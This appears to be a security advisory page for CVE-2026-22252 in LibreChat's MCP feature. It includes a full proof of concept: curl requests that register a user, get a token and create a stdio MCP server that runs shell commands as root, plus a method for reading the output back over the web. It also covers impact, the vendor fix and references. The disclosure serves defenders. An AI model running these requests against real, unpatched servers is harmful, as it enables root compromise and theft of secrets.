📄 LibreChat MCP Remote Command Execution

🗓️ 12 Jan 2026 00:00:00Reported by Jeremy BrownType

packetstorm🔗 packetstorm.news👁 198 Views

LibreChat MCP RCE (CVE-2026-22252) lets authenticated users run root commands in Docker via stdio on server creation.

Reporter	Title	Published	Views	Family All 15
Chainguard	CVE-2026-22252 vulnerabilities	30 Jan 202613:17	–	cgr
Circl	CVE-2026-22252	12 Jan 202620:01	–	circl
CNNVD	LibreChat 授权问题漏洞	12 Jan 202600:00	–	cnnvd
CVE	CVE-2026-22252	12 Jan 202618:01	–	cve
Cvelist	CVE-2026-22252 LibreChat MCP Stdio Remote Command Execution	12 Jan 202618:01	–	cvelist
EUVD	EUVD-2026-2008	12 Jan 202618:01	–	euvd
NVD	CVE-2026-22252	12 Jan 202619:16	–	nvd
OSV	CGA-RJCJ-HH2J-544G	30 Jan 202610:45	–	osv
OSV	CVE-2026-22252 LibreChat MCP Stdio Remote Command Execution	12 Jan 202618:01	–	osv
Packet Storm	📄 LibreChat MCP 0.8.2-rc2 Remote Code Execution	29 Jan 202600:00	–	packetstorm

LibreChat MCP Stdio Remote Command Execution
    
    Jeremy Brown (jbrown3264/gmail), January 2026
    
    =======
    Summary
    =======
    
    LibreChat's Model Context Protocol (MCP) implementation contained a RCE vulnerability (CVE-2026-22252) that allowed any authenticated user to execute commands as root on the Docker container. A single API request could trigger the exploit by taking advantage of the exposure of the stdio transport mechanism to platform users.
    
    ============
    How It Works
    ============
    
    There were a combination of factors that created exploitable scenario:
    
    Access: By default, any registered user was allowed to create new MCP servers.
    
    No Input Validation: The command field for the stdio transport type was not validated and exposed to users (instead of only admins). This meant you could pass any shell command you want.
    
    Immediate Execution: The command was executed immediately upon the creation of the MCP server during the "inspection" phase, even before a proper MCP handshake is established.
    
    ============
    Exploitation
    ============
    
    --------------------
    Step 1: Authenticate
    --------------------
    
    First, you need to register a user and get an authentication token.
    
    # Register a new user
    curl -X POST 'http://localhost:3080/api/auth/register' \
      -H 'Content-Type: application/json' \
      -d '{
        "name": "Attacker",
        "email": "[email protected]",
        "password": "Abc12345!",
        "confirm_password": "Abc12345!",
        "username": "attacker"
      }'
    
    # Login to get the token
    TOKEN=$(curl -s -X POST 'http://localhost:3080/api/auth/login' \
      -H 'Content-Type: application/json' \
      -d '{"email":"[email protected]","password":"Abc12345!"}' \
      | jq -r '.token')
    
    ---------------------------
    Step 2: Execute the Command
    ---------------------------
    
    Now, create the new "MCP" server. The command will be executed immediately.
    
    -----------------------------------
    Method 1: Basic Exploit (No Output)
    -----------------------------------
    
    This method executes a command but doesn't return the output directly. You'd need another way to verify execution.
    
    curl -X POST 'http://localhost:3080/api/mcp/servers' \
      -H "Authorization: Bearer $TOKEN" \
      -H 'Content-Type: application/json' \
      -d '{
        "config": {
          "type": "stdio",
          "title": "server",
          "command": "/bin/sh",
          "args": ["-c", "id > /tmp/output.txt"]
        }
      }'
    
    You can then verify the command was executed:
    
    docker exec LibreChat cat /tmp/output.txt
    # uid=0(root) gid=0(root) groups=0(root)...
    
    ------------------------------------------
    Method 2: Exploit with Output Exfiltration
    ------------------------------------------
    
    We can also write the output to a file in a publicly accessible directory and retrieve it with another request.
    
    curl -X POST 'http://localhost:3080/api/mcp/servers' \
      -H "Authorization: Bearer $TOKEN" \
      -H 'Content-Type: application/json' \
      -d '{
        "config": {
          "type": "stdio",
          "title": "server",
          "command": "/bin/sh",
          "args": ["-c", "id > /app/client/public/images/output.txt"]
        }
      }'
    
    Now, retrieve the output:
    
    curl http://localhost:3080/images/output.txt
    # uid=0(root) gid=0(root) groups=0(root)...
    
    ======
    Impact
    ======
    
    The vulnerability allows anyone who can access the server on a network and register to account to execute arbitrary commands as the root user on the vulnerable container.
    
    This means they could do things such as:
    
    Steal sensitive data: Access any keys or secrets on the container.
    
    Access the filesystem: Read and write with root privileges in the container.
    
    Pivot to the internal network: Use the compromised container as a foothold to attack other services on the network.
    
    Inject malicious content: Modify served files to launch supply chain attacks.
    
    ==========
    Mitigation
    ==========
    
    The LibreChat team was responsive, fixed the bug very quickly and published the advisory in about 1 week. It fixed in v0.8.2-rc2 with commit 211b39f addressing the root cause by removing the stdio transport option from the user-configurable API endpoint.
    
    The MCPServerUserInputSchema was updated to exclude StdioOptionsSchema so only administrators can configure stdio transports through the librechat.yaml file.
    
    ==========
    References
    ==========
    
    GitHub Security Advisory: GHSA-cxhj-j78r-p88f
    
    Fix Commit: 211b39f3113d4e6ecab84be0a83f4e9c9dea127f

12 Jan 2026 00:00Current

7.5High risk

Vulners AI Score7.5

CVSS 3.19.1 - 9.9

EPSS0.03678

SSVC